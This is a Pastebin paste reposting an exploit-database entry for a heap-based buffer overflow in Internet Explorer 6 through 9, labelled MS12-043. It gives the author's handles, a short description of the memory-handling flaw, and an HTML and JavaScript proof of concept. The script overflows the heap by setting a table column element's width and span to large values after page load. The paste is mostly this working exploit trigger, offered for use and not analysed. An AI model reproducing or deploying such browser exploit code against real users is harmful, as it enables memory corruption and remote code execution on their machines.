Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Was sent this from a friend who randomly goes spelunking around exploit DBs.
- # Title : MS Internet Explorer Heap Overflow (MS12-043)
- # Version : Internet Explorer 6 through 9
- # Auther : Senator of Pirates
- # Founders : Marshal Webb & Khalil Zhani
- # E-Mail : Senator.of.Pirates.team [at] gmail.com
- # FaceBook : /SenatorofPiratesInfo
- Vulnerability :
- -------------
- Microsoft Internet Explorer 6 through 9, and 10 Consumer Preview, does
- not properly handle objects in
- memory, which allows remote attackers to execute arbitrary code by
- attempting to access a nonexistent
- object, leading to a heap-based buffer overflow, aka "Col Element
- Remote Code Execution Vulnerabilit".
- Code :
- -----
- <html>
- <body>
- <table style="table-layout:fixed" >
- <col id="132" width="41" span="1" >  </col>
- </table>
- <script>
- function over_trigger() {
- var obj_col = document.getElementById("132");
- obj_col.width = "42765";
- obj_col.span = 1000;
- }
- setTimeout("over_trigger();",1);
- </script>
- </body>
- </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement